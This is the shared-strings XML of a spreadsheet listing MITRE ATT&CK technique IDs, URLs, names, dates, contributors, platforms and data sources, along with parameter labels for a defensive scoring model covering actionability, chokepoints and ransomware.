  <si>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https://attack.mitre.org/techniques/T1568/003</t>
  </si>
  <si>
    <t>Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1569</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1569/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1569/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1570</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1571</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1572</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1573</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1573/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1573/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/006</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/009</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/010</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/011</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/012</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</si>
  <si>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</si>
  <si>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Jesse Brown, Red Canary</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1578</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1578/001</t>
  </si>
  <si>
    <t>09 June 2020</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1578/002</t>
  </si>
  <si>
    <t>14 May 2020</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1578/003</t>
  </si>
  <si>
    <t>16 June 2020</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1578/004</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1580</t>
  </si>
  <si>
    <t>20 August 2020</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583</t>
  </si>
  <si>
    <t>30 September 2020</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</si>
  <si>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</si>
  <si>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PRE</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1583/002</t>
  </si>
  <si>
    <t>01 October 2020</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1583/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1583/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1583/005</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1583/006</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1584</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1584/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1584/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1584/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1584/004</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1584/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1585</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1585/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1585/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1586</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1586/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1586/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1587</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1587/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1587/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1587/003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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1587/004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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1588</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1588/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1588/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1588/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1588/004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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1588/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1588/006</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1589</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1589/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1589/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1590</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1590/003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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1590/004</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1590/005</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1590/006</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1591</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1591/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1591/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1591/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1591/004</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1592</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1592/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1592/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1592/003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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1592/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1593</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1593/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1593/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1594</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1595</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1595/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1595/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1596</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1596/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1596/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1596/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1596/004</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1596/005</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1597</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1597/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1597/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1598/001</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</si>
  <si>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</si>
  <si>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Robert Simmons, @MalwareUtkonos</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1598/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1598/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1599</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1599/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1600</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</si>
  <si>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</si>
  <si>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Encryption</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1600/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1600/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1601</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1601/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1601/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1602</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1602/001</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606</t>
  </si>
  <si>
    <t>17 December 2020</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1606/001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1606/002</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1608</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1608/001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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1608/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1608/003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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1608/004</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1608/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1609</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1610</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1611</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</si>
  <si>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</si>
  <si>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T1612</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1612</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</si>
  <si>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</si>
  <si>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Container and Resource Discovery</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1613</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1614</t>
  </si>
  <si>
    <t>01 April 2021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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1614/001</t>
  </si>
  <si>
    <t>18 August 2021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</si>
  <si>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</si>
  <si>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Harshal Tupsamudre, Qualys</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1615</t>
  </si>
  <si>
    <t>06 August 2021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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1619</t>
  </si>
  <si>
    <t>01 October 2021</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1620</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</si>
  <si>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</si>
  <si>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Parameter Name</t>
  </si>
  <si>
    <t>Explanation</t>
  </si>
  <si>
    <t>Value</t>
  </si>
  <si>
    <t>Actionability</t>
  </si>
  <si>
    <t>mitigations lower cutoff</t>
  </si>
  <si>
    <t>The lowest number of mitigations that contributes to actionability</t>
  </si>
  <si>
    <t>w_miti'</t>
  </si>
  <si>
    <t>mitigations upper cutoff</t>
  </si>
  <si>
    <t>The highest number of mitigations that contributes to actionabilty</t>
  </si>
  <si>
    <t>w_detect'</t>
  </si>
  <si>
    <t>detections lower cutoff</t>
  </si>
  <si>
    <t>The lowest number of detections that contributes to actionability</t>
  </si>
  <si>
    <t>w_miti</t>
  </si>
  <si>
    <t>=</t>
  </si>
  <si>
    <t>detections upper cutoff</t>
  </si>
  <si>
    <t>The highest number of detections that contributes to actionabilty</t>
  </si>
  <si>
    <t>w_detect</t>
  </si>
  <si>
    <t>mitigations-to-detections ratio</t>
  </si>
  <si>
    <t>Chokepoint</t>
  </si>
  <si>
    <t>before lower cutoff</t>
  </si>
  <si>
    <t>w_before'</t>
  </si>
  <si>
    <t>before upper cutoff</t>
  </si>
  <si>
    <t>w_after'</t>
  </si>
  <si>
    <t>after lower cutoff</t>
  </si>
  <si>
    <t>w_before</t>
  </si>
  <si>
    <t>after upper cutoff</t>
  </si>
  <si>
    <t>w_after</t>
  </si>
  <si>
    <t>before-to-after ratio</t>
  </si>
  <si>
    <t>t_now</t>
  </si>
  <si>
    <t>full</t>
  </si>
  <si>
    <t>decline</t>
  </si>
  <si>
    <t>w_min</t>
  </si>
  <si>
    <t>Ransomware (Utillity)</t>
  </si>
  <si>
    <t>tat lower cutoff</t>
  </si>
  <si>
    <t>w_tat'</t>
  </si>
  <si>
    <t>tat upper cutoff</t>
  </si>
  <si>
    <t>w_count'</t>
  </si>
  <si>
    <t>count lower cutoff</t>
  </si>
  <si>
    <t>w_tat</t>
  </si>
  <si>
    <t>count upper cutoff</t>
  </si>
  <si>
    <t>w_count</t>
  </si>
  <si>
    <t>tat-to-count ratio</t>
  </si>
  <si>
    <t>Ransomware (Polynomial)</t>
  </si>
  <si>
    <t>w_counttat'</t>
  </si>
  <si>
    <t>interaction term coefficient</t>
  </si>
  <si>
    <t>w_counttat</t>
  </si>
  <si>
    <t>w_countcount'</t>
  </si>
  <si>
    <t>count quadratic term coefficient</t>
  </si>
  <si>
    <t>w_countcount</t>
  </si>
  <si>
    <t>T1016.002</t>
  </si>
  <si>
    <t>Wi-Fi Discovery</t>
  </si>
  <si>
    <t>Process: OS API Execution, Command: Command Execution</t>
  </si>
  <si>
    <t>T1021.007</t>
  </si>
  <si>
    <t>Cloud Services</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>T1021.008</t>
  </si>
  <si>
    <t>Direct Cloud VM Connections</t>
  </si>
  <si>
    <t>T1027.010</t>
  </si>
  <si>
    <t>Command Obfuscation</t>
  </si>
  <si>
    <t>File: File Metadata, Script: Script Execution, Command: Command Execution</t>
  </si>
  <si>
    <t>T1027.011</t>
  </si>
  <si>
    <t>Fileless Storage</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Creation, WMI: WMI Creation</t>
  </si>
  <si>
    <t>T1027.012</t>
  </si>
  <si>
    <t>LNK Icon Smuggling</t>
  </si>
  <si>
    <t>File: File Metadata, File: File Creation</t>
  </si>
  <si>
    <t>T1036.008</t>
  </si>
  <si>
    <t>Masquerade File Type</t>
  </si>
  <si>
    <t>File: File Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>T1036.009</t>
  </si>
  <si>
    <t>Break Process Trees</t>
  </si>
  <si>
    <t>At</t>
  </si>
  <si>
    <t>T1059.009</t>
  </si>
  <si>
    <t>Cloud API</t>
  </si>
  <si>
    <t>T1098.006</t>
  </si>
  <si>
    <t>Additional Container Cluster Roles</t>
  </si>
  <si>
    <t>T1548.005</t>
  </si>
  <si>
    <t>Temporary Elevated Cloud Access</t>
  </si>
  <si>
    <t>T1552.008</t>
  </si>
  <si>
    <t>Chat Messages</t>
  </si>
  <si>
    <t>T1555.006</t>
  </si>
  <si>
    <t>Cloud Secrets Management Stores</t>
  </si>
  <si>
    <t>T1556.008</t>
  </si>
  <si>
    <t>Network Provider DLL</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification, Process: OS API Execution, File: File Creation</t>
  </si>
  <si>
    <t>T1562.011</t>
  </si>
  <si>
    <t>Spoof Security Alerting</t>
  </si>
  <si>
    <t>Process: Process Creation, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1562.012</t>
  </si>
  <si>
    <t>Disable or Modify Linux Audit System</t>
  </si>
  <si>
    <t>Process: OS API Execution, File: File Modification, Command: Command Execution, File: File Deletion, Process: Process Modification</t>
  </si>
  <si>
    <t>T1564.011</t>
  </si>
  <si>
    <t>Ignore Process Interrupts</t>
  </si>
  <si>
    <t>Process: Process Creation, Command: Command Execution</t>
  </si>
  <si>
    <t>T1566.004</t>
  </si>
  <si>
    <t>Spearphishing Voice</t>
  </si>
  <si>
    <t>T1567.003</t>
  </si>
  <si>
    <t>Exfiltration to Text Storage Sites</t>
  </si>
  <si>
    <t>T1567.004</t>
  </si>
  <si>
    <t>Exfiltration Over Webhook</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Content, File: File Access</t>
  </si>
  <si>
    <t>T1578.005</t>
  </si>
  <si>
    <t>Modify Cloud Compute Configurations</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Modification</t>
  </si>
  <si>
    <t>T1583.008</t>
  </si>
  <si>
    <t>Malvertising</t>
  </si>
  <si>
    <t>T1595.003</t>
  </si>
  <si>
    <t>Wordlist Scanning</t>
  </si>
  <si>
    <t>T1598.004</t>
  </si>
  <si>
    <t>Image: Image Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t xml:space="preserve"> n/a </t>
  </si>
  <si>
    <t>T1650</t>
  </si>
  <si>
    <t>Acquire Access</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>T1651</t>
  </si>
  <si>
    <t>Cloud Administration Command</t>
  </si>
  <si>
    <t>T1652</t>
  </si>
  <si>
    <t>Device Driver Discovery</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Process: OS API Execution, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1653</t>
  </si>
  <si>
    <t>Power Settings</t>
  </si>
  <si>
    <t>T1654</t>
  </si>
  <si>
    <t>Log Enumeration</t>
  </si>
  <si>
    <t>File: File Access, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1656</t>
  </si>
  <si>
    <t>Impersonation</t>
  </si>
  <si>
    <t>T1657</t>
  </si>
  <si>
    <t>Financial Theft</t>
  </si>
  <si>
    <t>T1659</t>
  </si>
  <si>
    <t>Content Injection</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Process: Process Creation, File: File Creation</t>
  </si>
  <si>
    <t>command-and-control</t>
  </si>
  <si>
    <t>Linux, macOS, Windows</t>
  </si>
  <si>
    <t>11 May 2022</t>
  </si>
  <si>
    <t>credential-access</t>
  </si>
  <si>
    <t>Windows, Linux, macOS</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Process: Process Creation, Network Traffic: Network Traffic Flow, Windows Registry: Windows Registry Key Access, Process: OS API Execution, File: File Access, Process: Process Access, Command: Command Execution, Active Directory: Active Directory Object Access</t>
  </si>
  <si>
    <t>Vincent Le Toux, Ed Williams, Trustwave, SpiderLabs</t>
  </si>
  <si>
    <t>Administrator, SYSTEM, root</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</si>
  <si>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</si>
  <si>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24 July 2023</t>
  </si>
  <si>
    <t>Process: Process Access, Windows Registry: Windows Registry Key Modification, Process: Process Creation, Process: OS API Execution, Logon Session: Logon Session Creation, Command: Command Execution</t>
  </si>
  <si>
    <t>Edward Millington, Ed Williams, Trustwave, SpiderLabs, Olaf Hartong, Falcon Force</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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Access, Windows Registry: Windows Registry Key Access, File: File Creation</t>
  </si>
  <si>
    <t>Ed Williams, Trustwave, SpiderLabs, Olaf Hartong, Falcon Force</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</si>
  <si>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</si>
  <si>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28 July 2023</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Access, Command: Command Execution</t>
  </si>
  <si>
    <t>19 October 2023</t>
  </si>
  <si>
    <t>25 April 2022</t>
  </si>
  <si>
    <t>ExtraHop, Vincent Le Toux</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</si>
  <si>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</si>
  <si>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15 April 2023</t>
  </si>
  <si>
    <t>Tim (Wadhwa-)Brown</t>
  </si>
  <si>
    <t>File: File Access, Command: Command Execution</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</si>
  <si>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</si>
  <si>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09 May 2023</t>
  </si>
  <si>
    <t>1.6</t>
  </si>
  <si>
    <t>collection</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</si>
  <si>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</si>
  <si>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Linux, macOS, Windows, Network</t>
  </si>
  <si>
    <t>Process: OS API Execution, Script: Script Execution, Command: Command Execution, Process: Process Creation, File: File Access</t>
  </si>
  <si>
    <t>William Cain, Austin Clark, @c2defense</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</si>
  <si>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</si>
  <si>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01 October 2023</t>
  </si>
  <si>
    <t>defense-evasion</t>
  </si>
  <si>
    <t>File: File Creation, Drive: Drive Access, Command: Command Execution</t>
  </si>
  <si>
    <t>Tom Simpson, CrowdStrike Falcon OverWatch</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</si>
  <si>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</si>
  <si>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1.5</t>
  </si>
  <si>
    <t>discovery</t>
  </si>
  <si>
    <t>Windows, macOS, Linux</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Process: OS API Execution</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Network Traffic: Network Connection Creation</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</si>
  <si>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</si>
  <si>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31 October 2023</t>
  </si>
  <si>
    <t>macOS, Windows, Linux</t>
  </si>
  <si>
    <t>Process: Process Creation, Command: Command Execution, Process: OS API Execution</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</si>
  <si>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</si>
  <si>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11 September 2023</t>
  </si>
  <si>
    <t>exfiltration</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, File: File Access, Command: Command Execution</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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Flow, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Process: OS API Execution, Windows Registry: Windows Registry Key Access, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Drive: Drive Modification, Firmware: Firmware Modification, File: File Modification</t>
  </si>
  <si>
    <t>Anti-virus, File Monitoring, Host Intrusion Prevention Systems, Application Control, Signature-based Detection, System Access Controls</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Script: Script Execution, Process: Process Creation, Process: OS API Execution</t>
  </si>
  <si>
    <t>Austin Clark, @c2defense</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1016/002</t>
  </si>
  <si>
    <t>08 September 2023</t>
  </si>
  <si>
    <t>05 October 2023</t>
  </si>
  <si>
    <t>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.</t>
  </si>
  <si>
    <t>Christopher Peacock, Uriel Kosayev, Liran Ravich, CardinalOps, Alex Spivakovsky, Pentera</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</si>
  <si>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</si>
  <si>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14 August 2023</t>
  </si>
  <si>
    <t>3.5</t>
  </si>
  <si>
    <t>Daniel Stepanic, Elastic, RedHuntLabs, @redhuntlabs, Austin Clark, @c2defense</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Traffic Flow, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Script: Script Execution</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</si>
  <si>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</si>
  <si>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14 April 2023</t>
  </si>
  <si>
    <t>Network, IaaS</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</si>
  <si>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</si>
  <si>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02 June 2023</t>
  </si>
  <si>
    <t>lateral-movement</t>
  </si>
  <si>
    <t>Linux, macOS, Windows, IaaS</t>
  </si>
  <si>
    <t>Module: Module Load, Network Traffic: Network Connection Creation, Command: Command Execution, Network Share: Network Share Access, WMI: WMI Creation, Logon Session: Logon Session Creation, Network Traffic: Network Traffic Flow, Process: Process Creation</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</si>
  <si>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</si>
  <si>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07 August 2023</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>Network Share: Network Share Access, Network Traffic: Network Traffic Flow, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Command: Command Execution</t>
  </si>
  <si>
    <t>11 August 2023</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Process: Process Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Process: Process Creation, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Process: Process Creation, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Command: Command Execution, Network Traffic: Network Traffic Flow, Service: Service Metadata</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/007</t>
  </si>
  <si>
    <t>21 February 2023</t>
  </si>
  <si>
    <t>Office 365, Azure AD, SaaS, IaaS, Google Workspace</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/008</t>
  </si>
  <si>
    <t>27 October 2023</t>
  </si>
  <si>
    <t>Thanabodi Phrakhun, @naikordian</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</si>
  <si>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</si>
  <si>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28 August 2023</t>
  </si>
  <si>
    <t>WMI: WMI Creation, Script: Script Execution, File: File Creation, Module: Module Load, Command: Command Execution, File: File Metadata, Process: OS API Execution, Windows Registry: Windows Registry Key Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Red Canary, Christiaan Beek, @ChristiaanBeek</t>
  </si>
  <si>
    <t>Host Forensic Analysis, Signature-based Detection, Host Intrusion Prevention Systems, Application Control, Log Analysis</t>
  </si>
  <si>
    <t>30 March 2023</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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, Process: Process Creation, File: File Metadata</t>
  </si>
  <si>
    <t>Praetorian, Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>Signature-based detection, Host intrusion prevention systems, Anti-virus, Binary Analysis, Static File Analysis</t>
  </si>
  <si>
    <t>24 May 2022</t>
  </si>
  <si>
    <t>14 July 2023</t>
  </si>
  <si>
    <t>Stan Hegt, Outflank, Jonathan Boucher, @crash_wave, Bank of Canada, Krishnan Subramanian, @krish203, Vinay Pidathala</t>
  </si>
  <si>
    <t>Anti-virus, Web Content Filters, Static File Analysis</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/007</t>
  </si>
  <si>
    <t>22 August 2022</t>
  </si>
  <si>
    <t>08 November 2022</t>
  </si>
  <si>
    <t>Module: Module Load, File: File Metadata, Process: OS API Execution</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/008</t>
  </si>
  <si>
    <t>29 September 2022</t>
  </si>
  <si>
    <t>macOS, Linux, Windows</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/009</t>
  </si>
  <si>
    <t>30 September 2022</t>
  </si>
  <si>
    <t>29 September 2023</t>
  </si>
  <si>
    <t>Nick Cairns, @grotezinfosec</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/010</t>
  </si>
  <si>
    <t>14 March 2023</t>
  </si>
  <si>
    <t>TruKno, Tim Peck, George Thomas</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/011</t>
  </si>
  <si>
    <t>23 March 2023</t>
  </si>
  <si>
    <t>Christopher Peacock, Denise Tan, Mark Wee, Simona David, Xavier Rousseau</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/012</t>
  </si>
  <si>
    <t>17 October 2023</t>
  </si>
  <si>
    <t xml:space="preserve">
</t>
  </si>
  <si>
    <t>Michael Raggi @aRtAGGI, Andrew Northern, @ex_raritas, Gregory Lesnewich, @greglesnewich</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Object Access, Process: OS API Execution, Command: Command Execution, Network Traffic: Network Traffic Content, Process: Process Creation, Network Traffic: Network Traffic Flow, Windows Registry: Windows Registry Key Access, File: File Access, Process: Process Access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</si>
  <si>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 Masquerading may also include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections.</t>
  </si>
  <si>
    <t>15 October 2023</t>
  </si>
  <si>
